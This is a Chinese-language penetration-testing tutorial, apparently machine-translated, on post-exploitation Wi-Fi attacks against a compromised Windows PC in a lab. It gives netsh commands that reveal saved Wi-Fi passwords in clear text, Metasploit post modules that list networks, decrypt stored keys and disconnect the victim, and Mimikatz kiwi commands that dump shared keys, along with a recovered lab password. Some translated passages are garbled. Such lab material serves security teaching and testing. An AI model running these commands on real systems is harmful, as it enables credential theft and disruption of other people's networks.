大多数Wi-Fi网络的安全协议经常被破坏或绕过,从而将无线互联网流量暴露给攻击者。通过本文,我们可以了解获取远程用户Wi-Fi基本服务集信息的不同方法以及当前网络连接信息,以及如何提取远程PC的已保存无线局域网配置文件,之后您将断开目标用户的Wi-也是。以下所有攻击都是后期攻击。
表中的内容
-
介绍
-
使用Wi-Fi
-
Wi-Fi安全类型
-
WLAN BSS列表
-
WLAN当前连接
-
WLAN配置文件
-
WLAN断开连接
-
Mimikatz
-
Netsh的
介绍
所有无线网络技术通常称为Wi-Fi。它提供高速互联网,因为它适用于无线电波。Wi-Fi商标归Wi-Fi联盟所有; 它正式定义为无线局域网(WLAN)。它受到许多应用程序和设备的支持,例如移动电话, PDA ,操作系统,视频游戏控制台等,因此,它可以让所有设备轻松进行通信。
使用Wi-Fi
顾名思义, Wi-Fi 网络在发送方和接收方之间没有物理连接。它使用与无线电波相关的电磁频谱内的射频。因此,它能够提供高速互联网。每个Wi-Fi连接都通过接入点(AP)工作。接入点的主要工作是广播电子设备进一步检测到的信号。在检测到信号时,他们连接到Wi-Fi以使用Wi-Fi。
Wi-Fi安全类型
-
有线等效保密
-
Wi-Fi保护访问
-
Wi-Fi保护访问2
Netsh的
现在你有一个受害者PC的会话,转到shell并使用以下命令找出受害者PC随时间的Wi-Fi连接;
1 | netsh wlan show profiles |
如上图所示,到目前为止,PC连接到Pentest Lab,Sinos,POCO PHONE,点燃。现在,我们可以使用以下内容获取有关网络的详细信息:
1 | netsh wlan show networks mode=bssid |
现在,使用以下命令查看特定Wi-Fi的密码:
1 | netsh wlan show profile name="ignit" key=clear |
WLAN BSS列表
此模块收集有关受害计算机可用的无线基本服务集的信息。
例如,这将为您提供有关无线连接的SSID和其他重要信息。
1 2 3 | msf > use post/windows/wlan/wlan_bss_list msf post(wlan_bss_list) > set session 5 msf post(wlan_bss_list) > exploit |
从下面给出的图像你可以看到它在这里发现了“5个网络”,如Pen lab,Sinos,Ignite等以及它们的基本3个细节
WLAN当前连接
此模块收集有关目标计算机上每个无线LAN接口上的当前连接的信息。
1 2 3 | msf > use post/windows/wlan/wlan_current_connection msf post(wlan_current_connection) > set session 5 msf post(wlan_current_connection) > run |
下面给出的图像已经公开了“笔实验室”是受害者连接的当前连接,而且它已经显示了一些基本细节,例如路由器的MAC地址,安全状态,认证类型等。
WLAN配置文件
此模块提取已保存的无线LAN配置文件 它还将尝试解密网络密钥材料。在WPA中,OS版本之间的行为略有不同。在Windows Vista / 7中,我们将获得密码。在Windows XP中,我们将获得PBKDF2派生的密钥。
1 2 3 | msf post> use post/windows/wlan/wlan_profile msf post(wlan_profile) > set session 5 msf post(wlan_profile) > exploit |
从下面给出的图像中你可以看到它已经提取了受害者连接的wifi配置文件,而且它还解密了共享密钥(密码)。因此,您可以确认“Pen Lab”的密码是“ ignite @ 123 ”。
WLAN断开连接
此模块断开指定接口上的当前无线网络连接。
1 2 3 | msf > use post/windows/wlan/wlan_disconnect msf post(wlan_bss_list) > set session 5 msf post(wlan_disconnect) > exploit |
从下面的图像中,您可以确认它正在断开受害者与当前无线网络的连接。
Mimikatz
我将其称为后期利用工具包,因为它具有许多功能,远远超出了转储纯文本密码的能力。
1 | meterpreter > load kiwi |
1 | meterpreter > help |
这将为您提供包含密码的整个无线连接列表。瞧!你做对了。
1 2 | meterpreter > wifi_list meterpreter > wifi_list_shared |
从下面给出的图像中,您可以确认它已转储所有共享密钥(密码)并验证其各自的SSID。
关于作者
Nisha Yadav接受过道德认证和Bug Bounty Hunter培训。她目前在Hiddenramp担任安全分析师。